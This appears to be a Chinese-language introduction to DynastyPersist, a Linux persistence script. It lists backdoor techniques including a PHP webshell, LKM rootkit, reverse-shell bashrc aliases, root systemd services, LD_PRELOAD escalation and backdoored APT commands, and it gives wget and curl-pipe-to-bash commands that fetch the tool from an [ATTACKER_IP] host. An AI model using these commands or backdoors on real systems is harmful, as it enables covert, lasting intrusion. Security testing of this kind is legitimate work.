DynastyPersist本质上是一个Linux持久化脚本,并提供了大量的安全测试功能,可以为我们展示在Linux操作系统上实现持久化的各种不同方法,并帮助广大研究人员测试和提升目标Linux操作系统的安全性。
1、SSH密钥生成:自动生成用于隐蔽性访问的SSH密钥;
2、Cronjob持久化:为持久化设置Cronjob;
3、自定义拥有root权限的用户:创建具有Root权限的自定义用户;
4、RCE持久化:过远程代码执行(php-webshell)实现持久化;
5、LKM/Rootkit:演示基于Linux内核模块(LKM)的Rootkit持久化;
6、Bashrc持久化:修改特定用户Shell初始化文件实现持久化(别名/反向Shell);
7、针对Root权限的Systemd Service:设置一个systemd服务实现root持久化;
8、LD_PRELOAD权限提升配置:配置LD_PRELOAD实现权限提升;
9、设置信息后门:对显示的系统信息植入后门以实现隐蔽性访问;
10、修改现有的Systemd Service:修改一个现有的systemd服务实现持久化;
11、后门APT命令:使用后门APT命令弹出Shell;
$ git clone https://github.com/Trevohack/DynastyPersist.git
然后执行下列命令并以8080端口启动服务端:
$ python3 -m http.server 8080
然后创建软连接,并切换到项目目录下,为工具主脚本提供可执行权限:
cd /opt
wget -c [ATTACKER-IP]:8080/DynastyPersist
cd DynastyPersist
chmod +x dynasty.sh
./dynasty.sh <ATTACKER_IP> <PORT>
除此之外,我们也可以直接使用One-Linear方式执行DynastyPersist:
curl -sSL [ATTACKER_IP]:8080/DynastyPersist/dynasty.sh <ATTACKER_IP> <PORT> | bash
https://discord.gg/WYzu65Hp